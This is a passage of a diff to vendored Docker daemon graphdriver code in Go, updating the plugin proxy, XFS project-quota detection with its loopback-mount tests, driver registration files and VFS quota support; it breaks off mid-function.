+package graphdriver // import "github.com/docker/docker/daemon/graphdriver" import ( "fmt" - "io" "path/filepath" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/plugin/v2" + "github.com/pkg/errors" ) -type pluginClient interface { - // Call calls the specified method with the specified arguments for the plugin. - Call(string, interface{}, interface{}) error - // Stream calls the specified method with the specified arguments for the plugin and returns the response IO stream - Stream(string, interface{}) (io.ReadCloser, error) - // SendFile calls the specified method, and passes through the IO stream - SendFile(string, io.Reader, interface{}) error -} - func lookupPlugin(name string, pg plugingetter.PluginGetter, config Options) (Driver, error) { if !config.ExperimentalEnabled { return nil, fmt.Errorf("graphdriver plugins are only supported with experimental mode") } - pl, err := pg.Get(name, "GraphDriver", plugingetter.ACQUIRE) + pl, err := pg.Get(name, "GraphDriver", plugingetter.Acquire) if err != nil { return nil, fmt.Errorf("Error looking up graphdriver plugin %s: %v", name, err) } @@ -33,11 +26,30 @@ func newPluginDriver(name string, pl plugingetter.CompatPlugin, config Options) home := config.Root if !pl.IsV1() { if p, ok := pl.(*v2.Plugin); ok { - if p.PropagatedMount != "" { + if p.PluginObj.Config.PropagatedMount != "" { home = p.PluginObj.Config.PropagatedMount } } } - proxy := &graphDriverProxy{name, pl} + + var proxy *graphDriverProxy + + switch pt := pl.(type) { + case plugingetter.PluginWithV1Client: + proxy = &graphDriverProxy{name, pl, Capabilities{}, pt.Client()} + case plugingetter.PluginAddr: + if pt.Protocol() != plugins.ProtocolSchemeHTTPV1 { + return nil, errors.Errorf("plugin protocol not supported: %s", pt.Protocol()) + } + addr := pt.Addr() + client, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, pt.Timeout()) + if err != nil { + return nil, errors.Wrap(err, "error creating plugin client") + } + proxy = &graphDriverProxy{name, pl, Capabilities{}, client} + default: + return nil, errdefs.System(errors.Errorf("got unknown plugin type %T", pt)) + } + return proxy, proxy.Init(filepath.Join(home, name), config.DriverOptions, config.UIDMaps, config.GIDMaps) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go b/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go index bfe74cc6f9..cb350d8074 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go @@ -1,19 +1,22 @@ -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" import ( "errors" "fmt" "io" - "path/filepath" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" ) type graphDriverProxy struct { - name string - p plugingetter.CompatPlugin + name string + p plugingetter.CompatPlugin + caps Capabilities + client *plugins.Client } type graphDriverRequest struct { @@ -24,13 +27,14 @@ type graphDriverRequest struct { } type graphDriverResponse struct { - Err string `json:",omitempty"` - Dir string `json:",omitempty"` - Exists bool `json:",omitempty"` - Status [][2]string `json:",omitempty"` - Changes []archive.Change `json:",omitempty"` - Size int64 `json:",omitempty"` - Metadata map[string]string `json:",omitempty"` + Err string `json:",omitempty"` + Dir string `json:",omitempty"` + Exists bool `json:",omitempty"` + Status [][2]string `json:",omitempty"` + Changes []archive.Change `json:",omitempty"` + Size int64 `json:",omitempty"` + Metadata map[string]string `json:",omitempty"` + Capabilities Capabilities `json:",omitempty"` } type graphDriverInitRequest struct { @@ -54,40 +58,48 @@ func (d *graphDriverProxy) Init(home string, opts []string, uidMaps, gidMaps []i GIDMaps: gidMaps, } var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Init", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Init", args, &ret); err != nil { return err } if ret.Err != "" { return errors.New(ret.Err) } + caps, err := d.fetchCaps() + if err != nil { + return err + } + d.caps = caps return nil } +func (d *graphDriverProxy) fetchCaps() (Capabilities, error) { + args := &graphDriverRequest{} + var ret graphDriverResponse + if err := d.client.Call("GraphDriver.Capabilities", args, &ret); err != nil { + if !plugins.IsNotFound(err) { + return Capabilities{}, err + } + } + return ret.Capabilities, nil +} + func (d *graphDriverProxy) String() string { return d.name } -func (d *graphDriverProxy) CreateReadWrite(id, parent string, opts *CreateOpts) error { - args := &graphDriverRequest{ - ID: id, - Parent: parent, - } - if opts != nil { - args.MountLabel = opts.MountLabel - args.StorageOpt = opts.StorageOpt - } +func (d *graphDriverProxy) Capabilities() Capabilities { + return d.caps +} - var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.CreateReadWrite", args, &ret); err != nil { - return err - } - if ret.Err != "" { - return errors.New(ret.Err) - } - return nil +func (d *graphDriverProxy) CreateReadWrite(id, parent string, opts *CreateOpts) error { + return d.create("GraphDriver.CreateReadWrite", id, parent, opts) } func (d *graphDriverProxy) Create(id, parent string, opts *CreateOpts) error { + return d.create("GraphDriver.Create", id, parent, opts) +} + +func (d *graphDriverProxy) create(method, id, parent string, opts *CreateOpts) error { args := &graphDriverRequest{ ID: id, Parent: parent, @@ -97,7 +109,7 @@ func (d *graphDriverProxy) Create(id, parent string, opts *CreateOpts) error { args.StorageOpt = opts.StorageOpt } var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Create", args, &ret); err != nil { + if err := d.client.Call(method, args, &ret); err != nil { return err } if ret.Err != "" { @@ -109,7 +121,7 @@ func (d *graphDriverProxy) Create(id, parent string, opts *CreateOpts) error { func (d *graphDriverProxy) Remove(id string) error { args := &graphDriverRequest{ID: id} var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Remove", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Remove", args, &ret); err != nil { return err } if ret.Err != "" { @@ -118,26 +130,26 @@ func (d *graphDriverProxy) Remove(id string) error { return nil } -func (d *graphDriverProxy) Get(id, mountLabel string) (string, error) { +func (d *graphDriverProxy) Get(id, mountLabel string) (containerfs.ContainerFS, error) { args := &graphDriverRequest{ ID: id, MountLabel: mountLabel, } var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Get", args, &ret); err != nil { - return "", err + if err := d.client.Call("GraphDriver.Get", args, &ret); err != nil { + return nil, err } var err error if ret.Err != "" { err = errors.New(ret.Err) } - return filepath.Join(d.p.BasePath(), ret.Dir), err + return containerfs.NewLocalContainerFS(d.p.ScopedPath(ret.Dir)), err } func (d *graphDriverProxy) Put(id string) error { args := &graphDriverRequest{ID: id} var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Put", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Put", args, &ret); err != nil { return err } if ret.Err != "" { @@ -149,7 +161,7 @@ func (d *graphDriverProxy) Put(id string) error { func (d *graphDriverProxy) Exists(id string) bool { args := &graphDriverRequest{ID: id} var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Exists", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Exists", args, &ret); err != nil { return false } return ret.Exists @@ -158,7 +170,7 @@ func (d *graphDriverProxy) Exists(id string) bool { func (d *graphDriverProxy) Status() [][2]string { args := &graphDriverRequest{} var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Status", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Status", args, &ret); err != nil { return nil } return ret.Status @@ -169,7 +181,7 @@ func (d *graphDriverProxy) GetMetadata(id string) (map[string]string, error) { ID: id, } var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.GetMetadata", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.GetMetadata", args, &ret); err != nil { return nil, err } if ret.Err != "" { @@ -188,7 +200,7 @@ func (d *graphDriverProxy) Cleanup() error { args := &graphDriverRequest{} var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Cleanup", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Cleanup", args, &ret); err != nil { return nil } if ret.Err != "" { @@ -202,7 +214,7 @@ func (d *graphDriverProxy) Diff(id, parent string) (io.ReadCloser, error) { ID: id, Parent: parent, } - body, err := d.p.Client().Stream("GraphDriver.Diff", args) + body, err := d.client.Stream("GraphDriver.Diff", args) if err != nil { return nil, err } @@ -215,7 +227,7 @@ func (d *graphDriverProxy) Changes(id, parent string) ([]archive.Change, error) Parent: parent, } var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Changes", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Changes", args, &ret); err != nil { return nil, err } if ret.Err != "" { @@ -227,7 +239,7 @@ func (d *graphDriverProxy) Changes(id, parent string) ([]archive.Change, error) func (d *graphDriverProxy) ApplyDiff(id, parent string, diff io.Reader) (int64, error) { var ret graphDriverResponse - if err := d.p.Client().SendFile(fmt.Sprintf("GraphDriver.ApplyDiff?id=%s&parent=%s", id, parent), diff, &ret); err != nil { + if err := d.client.SendFile(fmt.Sprintf("GraphDriver.ApplyDiff?id=%s&parent=%s", id, parent), diff, &ret); err != nil { return -1, err } if ret.Err != "" { @@ -242,7 +254,7 @@ func (d *graphDriverProxy) DiffSize(id, parent string) (int64, error) { Parent: parent, } var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.DiffSize", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.DiffSize", args, &ret); err != nil { return -1, err } if ret.Err != "" { diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/quota/errors.go b/vendor/github.com/docker/docker/daemon/graphdriver/quota/errors.go new file mode 100644 index 0000000000..68e797470d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/quota/errors.go @@ -0,0 +1,19 @@ +package quota // import "github.com/docker/docker/daemon/graphdriver/quota" + +import "github.com/docker/docker/errdefs" + +var ( + _ errdefs.ErrNotImplemented = (*errQuotaNotSupported)(nil) +) + +// ErrQuotaNotSupported indicates if were found the FS didn't have projects quotas available +var ErrQuotaNotSupported = errQuotaNotSupported{} + +type errQuotaNotSupported struct { +} + +func (e errQuotaNotSupported) NotImplemented() {} + +func (e errQuotaNotSupported) Error() string { + return "Filesystem does not support, or has not enabled quotas" +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go index e408d5f906..93e85823af 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go @@ -9,7 +9,7 @@ // for both xfs/ext4 for kernel version >= v4.5 // -package quota +package quota // import "github.com/docker/docker/daemon/graphdriver/quota" /* #include @@ -47,18 +47,20 @@ struct fsxattr { #ifndef Q_XGETPQUOTA #define Q_XGETPQUOTA QCMD(Q_XGETQUOTA, PRJQUOTA) #endif + +const int Q_XGETQSTAT_PRJQUOTA = QCMD(Q_XGETQSTAT, PRJQUOTA); */ import "C" import ( "fmt" "io/ioutil" - "os" "path" "path/filepath" - "syscall" "unsafe" - "github.com/Sirupsen/logrus" + rsystem "github.com/opencontainers/runc/libcontainer/system" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) // Quota limit params - currently we only control blocks hard limit @@ -98,13 +100,12 @@ type Control struct { // func NewControl(basePath string) (*Control, error) { // - // Get project id of parent dir as minimal id to be used by driver + // If we are running in a user namespace quota won't be supported for + // now since makeBackingFsDev() will try to mknod(). // - minProjectID, err := getProjectID(basePath) - if err != nil { - return nil, err + if rsystem.RunningInUserNS() { + return nil, ErrQuotaNotSupported } - minProjectID++ // // create backing filesystem device node @@ -114,6 +115,25 @@ func NewControl(basePath string) (*Control, error) { return nil, err } + // check if we can call quotactl with project quotas + // as a mechanism to determine (early) if we have support + hasQuotaSupport, err := hasQuotaSupport(backingFsBlockDev) + if err != nil { + return nil, err + } + if !hasQuotaSupport { + return nil, ErrQuotaNotSupported + } + + // + // Get project id of parent dir as minimal id to be used by driver + // + minProjectID, err := getProjectID(basePath) + if err != nil { + return nil, err + } + minProjectID++ + // // Test if filesystem supports project quotas by trying to set // a quota on the first available project id @@ -184,7 +204,7 @@ func setProjectQuota(backingFsBlockDev string, projectID uint32, quota Quota) er var cs = C.CString(backingFsBlockDev) defer C.free(unsafe.Pointer(cs)) - _, _, errno := syscall.Syscall6(syscall.SYS_QUOTACTL, C.Q_XSETPQLIM, + _, _, errno := unix.Syscall6(unix.SYS_QUOTACTL, C.Q_XSETPQLIM, uintptr(unsafe.Pointer(cs)), uintptr(d.d_id), uintptr(unsafe.Pointer(&d)), 0, 0) if errno != 0 { @@ -211,7 +231,7 @@ func (q *Control) GetQuota(targetPath string, quota *Quota) error { var cs = C.CString(q.backingFsBlockDev) defer C.free(unsafe.Pointer(cs)) - _, _, errno := syscall.Syscall6(syscall.SYS_QUOTACTL, C.Q_XGETPQUOTA, + _, _, errno := unix.Syscall6(unix.SYS_QUOTACTL, C.Q_XGETPQUOTA, uintptr(unsafe.Pointer(cs)), uintptr(C.__u32(projectID)), uintptr(unsafe.Pointer(&d)), 0, 0) if errno != 0 { @@ -232,7 +252,7 @@ func getProjectID(targetPath string) (uint32, error) { defer closeDir(dir) var fsx C.struct_fsxattr - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR, uintptr(unsafe.Pointer(&fsx))) if errno != 0 { return 0, fmt.Errorf("Failed to get projid for %s: %v", targetPath, errno.Error()) @@ -250,14 +270,14 @@ func setProjectID(targetPath string, projectID uint32) error { defer closeDir(dir) var fsx C.struct_fsxattr - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR, uintptr(unsafe.Pointer(&fsx))) if errno != 0 { return fmt.Errorf("Failed to get projid for %s: %v", targetPath, errno.Error()) } fsx.fsx_projid = C.__u32(projectID) fsx.fsx_xflags |= C.FS_XFLAG_PROJINHERIT - _, _, errno = syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSSETXATTR, + _, _, errno = unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSSETXATTR, uintptr(unsafe.Pointer(&fsx))) if errno != 0 { return fmt.Errorf("Failed to set projid for %s: %v", targetPath, errno.Error()) @@ -322,18 +342,43 @@ func getDirFd(dir *C.DIR) uintptr { // and create a block device node under the home directory // to be used by quotactl commands func makeBackingFsDev(home string) (string, error) { - fileinfo, err := os.Stat(home) - if err != nil { + var stat unix.Stat_t + if err := unix.Stat(home, &stat); err != nil { return "", err } backingFsBlockDev := path.Join(home, "backingFsBlockDev") - // Re-create just in case comeone copied the home directory over to a new device - syscall.Unlink(backingFsBlockDev) - stat := fileinfo.Sys().(*syscall.Stat_t) - if err := syscall.Mknod(backingFsBlockDev, syscall.S_IFBLK|0600, int(stat.Dev)); err != nil { + // Re-create just in case someone copied the home directory over to a new device + unix.Unlink(backingFsBlockDev) + err := unix.Mknod(backingFsBlockDev, unix.S_IFBLK|0600, int(stat.Dev)) + switch err { + case nil: + return backingFsBlockDev, nil + + case unix.ENOSYS: + return "", ErrQuotaNotSupported + + default: return "", fmt.Errorf("Failed to mknod %s: %v", backingFsBlockDev, err) } +} + +func hasQuotaSupport(backingFsBlockDev string) (bool, error) { + var cs = C.CString(backingFsBlockDev) + defer free(cs) + var qstat C.fs_quota_stat_t + + _, _, errno := unix.Syscall6(unix.SYS_QUOTACTL, uintptr(C.Q_XGETQSTAT_PRJQUOTA), uintptr(unsafe.Pointer(cs)), 0, uintptr(unsafe.Pointer(&qstat)), 0, 0) + if errno == 0 && qstat.qs_flags&C.FS_QUOTA_PDQ_ENFD > 0 && qstat.qs_flags&C.FS_QUOTA_PDQ_ACCT > 0 { + return true, nil + } + + switch errno { + // These are the known fatal errors, consider all other errors (ENOTTY, etc.. not supporting quota) + case unix.EFAULT, unix.ENOENT, unix.ENOTBLK, unix.EPERM: + default: + return false, nil + } - return backingFsBlockDev, nil + return false, errno } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota_test.go new file mode 100644 index 0000000000..aa164cc419 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota_test.go @@ -0,0 +1,152 @@ +// +build linux + +package quota // import "github.com/docker/docker/daemon/graphdriver/quota" + +import ( + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "testing" + + "golang.org/x/sys/unix" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" +) + +// 10MB +const testQuotaSize = 10 * 1024 * 1024 +const imageSize = 64 * 1024 * 1024 + +func TestBlockDev(t *testing.T) { + mkfs, err := exec.LookPath("mkfs.xfs") + if err != nil { + t.Skip("mkfs.xfs not found in PATH") + } + + // create a sparse image + imageFile, err := ioutil.TempFile("", "xfs-image") + if err != nil { + t.Fatal(err) + } + imageFileName := imageFile.Name() + defer os.Remove(imageFileName) + if _, err = imageFile.Seek(imageSize-1, 0); err != nil { + t.Fatal(err) + } + if _, err = imageFile.Write([]byte{0}); err != nil { + t.Fatal(err) + } + if err = imageFile.Close(); err != nil { + t.Fatal(err) + } + + // The reason for disabling these options is sometimes people run with a newer userspace + // than kernelspace + out, err := exec.Command(mkfs, "-m", "crc=0,finobt=0", imageFileName).CombinedOutput() + if len(out) > 0 { + t.Log(string(out)) + } + if err != nil { + t.Fatal(err) + } + + t.Run("testBlockDevQuotaDisabled", wrapMountTest(imageFileName, false, testBlockDevQuotaDisabled)) + t.Run("testBlockDevQuotaEnabled", wrapMountTest(imageFileName, true, testBlockDevQuotaEnabled)) + t.Run("testSmallerThanQuota", wrapMountTest(imageFileName, true, wrapQuotaTest(testSmallerThanQuota))) + t.Run("testBiggerThanQuota", wrapMountTest(imageFileName, true, wrapQuotaTest(testBiggerThanQuota))) + t.Run("testRetrieveQuota", wrapMountTest(imageFileName, true, wrapQuotaTest(testRetrieveQuota))) +} + +func wrapMountTest(imageFileName string, enableQuota bool, testFunc func(t *testing.T, mountPoint, backingFsDev string)) func(*testing.T) { + return func(t *testing.T) { + mountOptions := "loop" + + if enableQuota { + mountOptions = mountOptions + ",prjquota" + } + + mountPointDir := fs.NewDir(t, "xfs-mountPoint") + defer mountPointDir.Remove() + mountPoint := mountPointDir.Path() + + out, err := exec.Command("mount", "-o", mountOptions, imageFileName, mountPoint).CombinedOutput() + if err != nil { + _, err := os.Stat("/proc/fs/xfs") + if os.IsNotExist(err) { + t.Skip("no /proc/fs/xfs") + } + } + + assert.NilError(t, err, "mount failed: %s", out) + + defer func() { + assert.NilError(t, unix.Unmount(mountPoint, 0)) + }() + + backingFsDev, err := makeBackingFsDev(mountPoint) + assert.NilError(t, err) + + testFunc(t, mountPoint, backingFsDev) + } +} + +func testBlockDevQuotaDisabled(t *testing.T, mountPoint, backingFsDev string) { + hasSupport, err := hasQuotaSupport(backingFsDev) + assert.NilError(t, err) + assert.Check(t, !hasSupport) +} + +func testBlockDevQuotaEnabled(t *testing.T, mountPoint, backingFsDev string) { + hasSupport, err := hasQuotaSupport(backingFsDev) + assert.NilError(t, err) + assert.Check(t, hasSupport) +} + +func wrapQuotaTest(testFunc func(t *testing.T, ctrl *Control, mountPoint, testDir, testSubDir string)) func(t *testing.T, mountPoint, backingFsDev string) { + return func(t *testing.T, mountPoint, backingFsDev string) { + testDir, err := ioutil.TempDir(mountPoint, "per-test") + assert.NilError(t, err) + defer os.RemoveAll(testDir) + + ctrl, err := NewControl(testDir) + assert.NilError(t, err) + + testSubDir, err := ioutil.TempDir(testDir, "quota-test") + assert.NilError(t, err) + testFunc(t, ctrl, mountPoint, testDir, testSubDir) + } + +} + +func testSmallerThanQuota(t *testing.T, ctrl *Control, homeDir, testDir, testSubDir string) { + assert.NilError(t, ctrl.SetQuota(testSubDir, Quota{testQuotaSize})) + smallerThanQuotaFile := filepath.Join(testSubDir, "smaller-than-quota") + assert.NilError(t, ioutil.WriteFile(smallerThanQuotaFile, make([]byte, testQuotaSize/2), 0644)) + assert.NilError(t, os.Remove(smallerThanQuotaFile)) +} + +func testBiggerThanQuota(t *testing.T, ctrl *Control, homeDir, testDir, testSubDir string) { + // Make sure the quota is being enforced + // TODO: When we implement this under EXT4, we need to shed CAP_SYS_RESOURCE, otherwise + // we're able to violate quota without issue + assert.NilError(t, ctrl.SetQuota(testSubDir, Quota{testQuotaSize})) + + biggerThanQuotaFile := filepath.Join(testSubDir, "bigger-than-quota") + err := ioutil.WriteFile(biggerThanQuotaFile, make([]byte, testQuotaSize+1), 0644) + assert.Assert(t, is.ErrorContains(err, "")) + if err == io.ErrShortWrite { + assert.NilError(t, os.Remove(biggerThanQuotaFile)) + } +} + +func testRetrieveQuota(t *testing.T, ctrl *Control, homeDir, testDir, testSubDir string) { + // Validate that we can retrieve quota + assert.NilError(t, ctrl.SetQuota(testSubDir, Quota{testQuotaSize})) + + var q Quota + assert.NilError(t, ctrl.GetQuota(testSubDir, &q)) + assert.Check(t, is.Equal(uint64(testQuotaSize), q.Size)) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go index 262954d6e3..ec18d1d377 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go @@ -1,6 +1,6 @@ // +build !exclude_graphdriver_aufs,linux -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( // register the aufs graphdriver diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go index f456cc5ce5..2f8c67056b 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go @@ -1,6 +1,6 @@ // +build !exclude_graphdriver_btrfs,linux -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( // register the btrfs graphdriver diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go index bb2e9ef541..ccbb8bfabe 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go @@ -1,6 +1,6 @@ -// +build !exclude_graphdriver_devicemapper,linux +// +build !exclude_graphdriver_devicemapper,!static_build,linux -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( // register the devmapper graphdriver diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go index 9ba849cedc..a2e384d548 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go @@ -1,9 +1,8 @@ // +build !exclude_graphdriver_overlay,linux -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( // register the overlay graphdriver _ "github.com/docker/docker/daemon/graphdriver/overlay" - _ "github.com/docker/docker/daemon/graphdriver/overlay2" ) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay2.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay2.go new file mode 100644 index 0000000000..bcd2cee20e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay2.go @@ -0,0 +1,8 @@ +// +build !exclude_graphdriver_overlay2,linux + +package register // import "github.com/docker/docker/daemon/graphdriver/register" + +import ( + // register the overlay2 graphdriver + _ "github.com/docker/docker/daemon/graphdriver/overlay2" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go index 98fad23b20..26f33a21ba 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go @@ -1,4 +1,4 @@ -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( // register vfs diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go index efaa5005ed..cd612cbea9 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go @@ -1,6 +1,7 @@ -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( - // register the windows graph driver + // register the windows graph drivers + _ "github.com/docker/docker/daemon/graphdriver/lcow" _ "github.com/docker/docker/daemon/graphdriver/windows" ) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go index 8f34e35537..b137ad25b7 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go @@ -1,6 +1,6 @@ -// +build !exclude_graphdriver_zfs,linux !exclude_graphdriver_zfs,freebsd, solaris +// +build !exclude_graphdriver_zfs,linux !exclude_graphdriver_zfs,freebsd -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( // register the zfs driver diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_linux.go new file mode 100644 index 0000000000..7276b3837f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_linux.go @@ -0,0 +1,7 @@ +package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs" + +import "github.com/docker/docker/daemon/graphdriver/copy" + +func dirCopy(srcDir, dstDir string) error { + return copy.DirCopy(srcDir, dstDir, copy.Content, false) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_unsupported.go new file mode 100644 index 0000000000..894ff02f02 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_unsupported.go @@ -0,0 +1,9 @@ +// +build !linux + +package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs" + +import "github.com/docker/docker/pkg/chrootarchive" + +func dirCopy(srcDir, dstDir string) error { + return chrootarchive.NewArchiver(nil).CopyWithTar(srcDir, dstDir) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go index 8832d11531..e51cb6c250 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go @@ -1,4 +1,4 @@ -package vfs +package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs" import ( "fmt" @@ -6,15 +6,17 @@ import ( "path/filepath" "github.com/docker/docker/daemon/graphdriver" - "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/daemon/graphdriver/quota" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" - - "github.com/opencontainers/runc/libcontainer/label" + "github.com/docker/docker/pkg/system" + "github.com/docker/go-units" + "github.com/opencontainers/selinux/go-selinux/label" ) var ( - // CopyWithTar defines the copy method to use. - CopyWithTar = chrootarchive.CopyWithTar + // CopyDir defines the copy method to use. + CopyDir = dirCopy ) func init() { @@ -25,17 +27,16 @@ func init() { // This sets the home directory for the driver and returns NaiveDiffDriver. func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { d := &Driver{ - home: home, - uidMaps: uidMaps, - gidMaps: gidMaps, - } - rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) - if err != nil { - return nil, err + home: home, + idMappings: idtools.NewIDMappingsFromMaps(uidMaps, gidMaps), } - if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil { + rootIDs := d.idMappings.RootPair() + if err := idtools.MkdirAllAndChown(home, 0700, rootIDs); err != nil { return nil, err } + + setupDriverQuota(d) + return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil } @@ -44,9 +45,9 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap // In order to support layering, files are copied from the parent layer into the new layer. There is no copy-on-write support. // Driver must be wrapped in NaiveDiffDriver to be used as a graphdriver.Driver type Driver struct { - home string - uidMaps []idtools.IDMap - gidMaps []idtools.IDMap + driverQuota + home string + idMappings *idtools.IDMappings } func (d *Driver) String() string { @@ -71,26 +72,53 @@ func (d *Driver) Cleanup() error { // CreateReadWrite creates a layer that is writable for use as a container // file system. func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { - return d.Create(id, parent, opts) + var err error + var size int64 + + if opts != nil { + for key, val := range opts.StorageOpt { + switch key { + case "size": + if !d.quotaSupported() { + return quota.ErrQuotaNotSupported + } + if size, err = units.RAMInBytes(val); err != nil { + return err + } + default: + return fmt.Errorf("Storage opt %s not supported", key) + } + } + } + + return d.create(id, parent, uint64(size)) } // Create prepares the filesystem for the VFS driver and copies the directory for the given id under the parent. func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { if opts != nil && len(opts.StorageOpt) != 0 { - return fmt.Errorf("--storage-opt is not supported for vfs") + return fmt.Errorf("--storage-opt is not supported for vfs on read-only layers") } + return d.create(id, 